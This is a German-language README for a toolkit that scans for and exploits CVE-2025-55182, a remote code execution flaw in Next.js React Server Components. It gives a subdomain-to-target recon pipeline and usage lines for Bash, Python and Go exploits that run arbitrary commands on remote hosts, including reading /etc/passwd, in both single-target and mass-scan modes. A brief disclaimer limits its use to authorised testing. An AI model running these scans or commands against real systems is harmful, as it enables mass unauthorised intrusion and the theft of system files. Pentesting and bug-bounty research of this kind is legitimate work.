
Hochpräziser RCE-Scanner für CVE-2025-55182, der Next.js RSC betrifft. Unterstützt Massenscans, Befehlsausführung und automatisierte Recon-Pipelines. Entwickelt für Pentester, Sicherheitsforscher und Bug-Bounty-Jäger.
Ein umfassendes Toolkit zur Erkennung und Ausnutzung von CVE-2025-55182, einer kritischen Remote-Code-Ausführungsschwachstelle in Next.js-Anwendungen, die React Server Components verwenden.
Dieses Repository enthält einen einheitlichen Bash-Scanner (Einzel- & Massenmodus), Python/Go-Implementierungen und einen Bug-Bounty-Reconnaissance-Workflow.

Für die Massensuche auf Wildcard-Domains verwenden Sie diese Pipeline, um Ziele vor dem Scannen zu filtern:
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt
# 2. Filter for live hosts
httpx -l subs.txt -o live.txt
# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt
Das Skript scanner.sh unterstützt Einzelziel-Scans und Massen-Scans aus einer Dateiliste.
chmod +x scanner.sh
Am besten geeignet, um ein bestimmtes Ziel mit ausführlicher Ausgabe zu überprüfen.
# Basic check (defaults to "id")
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"
Scannt effizient eine Liste von URLs und speichert verwundbare Hosts in einer Datei.
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"
# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt
Verwenden Sie diese Version, wenn Sie Probleme mit dem Escaping von Sonderzeichen in Bash haben.
pip install requests
python3 python/exploit.py -u http://target.com -c "uname -a"
Hohe Leistung, minimale Abhängigkeiten.
go run go/main.go -u http://target.com -c "id"
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com
Dieses Tool dient nur zu Bildungszwecken und autorisierten Sicherheitstests. Unbefugte Nutzung ist strikt illegal. Der Entwickler übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
NVD-CVE-Detail: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
React-Sicherheitshinweis (React Server Components-Schwachstelle): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
ProjectDiscovery-Nuclei-Template: https://cloud.projectdiscovery.io/library/CVE-2025-55182
| Flag | Beschreibung |
|---|
-d, --domain | Einzelziel-URL |
-l, --list | Datei mit einer Liste von URLs |
-c, --command | Auszuführender Befehl (Standard: id) |
-o, --output | Ausgabedatei für verwundbare Hosts (Standard: vulnerable_hosts.txt) |